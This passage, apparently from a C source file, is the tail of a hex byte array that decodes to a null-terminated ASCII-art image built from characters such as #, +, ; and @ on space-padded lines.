0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x2B, 0x3B, 0x23, 0x23, 0x23, 0x2B, 0x2C, 0x2B, 0x2B, 0x3B, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x40, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x3A, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x3A, 0x2B, 0x23, 0x2B, 0x2B, 0x2B, 0x2B, 0x23, 0x2B, 0x27, 0x3A, 0x2B, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x27, 0x2B, 0x2B, 0x2B, 0x27, 0x2C, 0x2E, 0x27, 0x2C, 0x3A, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x27, 0x27, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x27, 0x3A, 0x3A, 0x23, 0x23, 0x2B, 0x2B, 0x2B, 0x3B, 0x2E, 0x2C, 0x20, 0x20, 0x3B, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x27, 0x2C, 0x20, 0x20, 0x2C, 0x27, 0x3B, 0x2E, 0x3A, 0x3B, 0x27, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x27, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x27, 0x27, 0x2B, 0x3B, 0x23, 0x23, 0x2B, 0x2B, 0x3B, 0x2B, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x27, 0x2E, 0x27, 0x27, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x27, 0x2C, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x3A, 0x2B, 0x23, 0x3B, 0x2B, 0x23, 0x2B, 0x3A, 0x23, 0x40, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x3B, 0x3B, 0x27, 0x27, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x3B, 0x27, 0x2B, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x2B, 0x27, 0x2B, 0x27, 0x2E, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x27, 0x23, 0x2B, 0x23, 0x2B, 0x3B, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x27, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x2B, 0x23, 0x27, 0x3B, 0x2E, 0x27, 0x27, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x3B, 0x2B, 0x3A, 0x2C, 0x27, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x23, 0x20, 0x3B, 0x20, 0x20, 0x20, 0x3B, 0x2E, 0x27, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x27, 0x2B, 0x27, 0x2B, 0x23, 0x3B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x27, 0x3B, 0x2C, 0x2C, 0x3B, 0x23, 0x27, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3B, 0x23, 0x23, 0x20, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x60, 0x2B, 0x2B, 0x2C, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x27, 0x3A, 0x3B, 0x2C, 0x3A, 0x3A, 0x3A, 0x27, 0x2B, 0x3B, 0x3A, 0x2C, 0x2C, 0x20, 0x20, 0x2B, 0x23, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x2E, 0x23, 0x2E, 0x27, 0x27, 0x2B, 0x2B, 0x2B, 0x2B, 0x3A, 0x27, 0x2B, 0x2B, 0x2B, 0x2B, 0x27, 0x3B, 0x2B, 0x27, 0x2B, 0x23, 0x23, 0x3B, 0x3B, 0x3B, 0x27, 0x23, 0x20, 0x20, 0x23, 0x23, 0x27, 0x60, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x3B, 0x2E, 0x2B, 0x2B, 0x2B, 0x27, 0x2B, 0x2B, 0x2B, 0x27, 0x3B, 0x3B, 0x23, 0x2B, 0x27, 0x3B, 0x3B, 0x3B, 0x3B, 0x23, 0x23, 0x2E, 0x27, 0x2B, 0x2B, 0x23, 0x23, 0x20, 0x20, 0x60, 0x23, 0x3A, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x2B, 0x27, 0x2B, 0x23, 0x2B, 0x3A, 0x2B, 0x3B, 0x3A, 0x3A, 0x27, 0x27, 0x27, 0x3B, 0x2B, 0x27, 0x27, 0x3A, 0x3B, 0x2B, 0x20, 0x40, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2C, 0x60, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x60, 0x2C, 0x3B, 0x27, 0x27, 0x27, 0x2B, 0x23, 0x2B, 0x27, 0x2B, 0x2B, 0x2B, 0x23, 0x2B, 0x2B, 0x2B, 0x2C, 0x20, 0x20, 0x23, 0x2E, 0x20, 0x40, 0x60, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x23, 0x2B, 0x3B, 0x2B, 0x3B, 0x3A, 0x27, 0x27, 0x23, 0x27, 0x2E, 0x2C, 0x2E, 0x2C, 0x2E, 0x3B, 0x27, 0x23, 0x20, 0x20, 0x20, 0x20, 0x40, 0x20, 0x20, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x20, 0x20, 0x20, 0x20, 0x23, 0x20, 0x23, 0x27, 0x23, 0x23, 0x20, 0x20, 0x3B, 0x2B, 0x2B, 0x2B, 0x2B, 0x2B, 0x3A, 0x20, 0x20, 0x23, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x20, 0x20, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x27, 0x23, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x27, 0x23, 0x23, 0x20, 0x20, 0x20, 0x23, 0x3A, 0x20, 0x2B, 0x20, 0x40, 0x20, 0x20, 0x20, 0x27, 0x2C, 0x20, 0x20, 0x23, 0x23, 0x20, 0x20, 0x20, 0x23, 0x2B, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x2C, 0x23, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x20, 0x20, 0x20, 0x27, 0x23, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x20, 0x20, 0x20, 0x2B, 0x60, 0x20, 0x20, 0x20, 0x27, 0x20, 0x20, 0x20, 0x2B, 0x23, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3B, 0x2C, 0x20, 0x20, 0x20, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x20, 0x20, 0x20, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x23, 0x27, 0x60, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x20, 0x20, 0x20, 0x20, 0x60, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x00
};
